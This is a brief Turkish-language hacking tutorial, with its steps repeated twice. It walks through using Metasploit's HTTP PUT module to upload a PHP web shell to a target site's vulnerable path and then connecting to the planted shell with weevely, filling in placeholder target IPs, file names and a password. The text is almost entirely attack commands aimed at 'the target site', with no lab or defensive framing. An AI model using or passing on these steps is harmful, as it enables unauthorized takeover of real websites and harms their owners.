Eğer put exploit açığı bulduğunuz bir site varsa göstereceğim adımları uygulayın.
Msfconsol programını açın..
msf > use auxiliary/scanner/http/http_put
msf > set rhosts "HEDEF SİTENİN İP ADRESİ" /ÖRNEK : set rhosts 192.168.45.31
msf > set path "AÇIĞIN OLDUĞU YER" / ÖRNEK : set path /get/
msf > set filename "SHELL DOSYASI" / ÖRNEK : set filename makassar.php
msf > set filedata file://root/Desktop/shell2.php / Siz eğer parrot vs kullanıyorsanız (cd desktop yazın ve sonra pwd yazın /User/root/Desktop/shell2.php)
msf > exploit
İŞLEM OLDUKTAN SONRA : ~# weevely http://hedefsite.com/path/makassar.php "ŞİFRE" / ÖRNEK : weevely http://hedefsite.com/path/makassar.php 12345
Ve işlem tamamlanmıştır.
Msfconsol programını açın..
msf > use auxiliary/scanner/http/http_put
msf > set rhosts "HEDEF SİTENİN İP ADRESİ" /ÖRNEK : set rhosts 192.168.45.31
msf > set path "AÇIĞIN OLDUĞU YER" / ÖRNEK : set path /get/
msf > set filename "SHELL DOSYASI" / ÖRNEK : set filename makassar.php
msf > set filedata file://root/Desktop/shell2.php / Siz eğer parrot vs kullanıyorsanız (cd desktop yazın ve sonra pwd yazın /User/root/Desktop/shell2.php)
msf > exploit
İŞLEM OLDUKTAN SONRA : ~# weevely http://hedefsite.com/path/makassar.php "ŞİFRE" / ÖRNEK : weevely http://hedefsite.com/path/makassar.php 12345
Ve işlem tamamlanmıştır.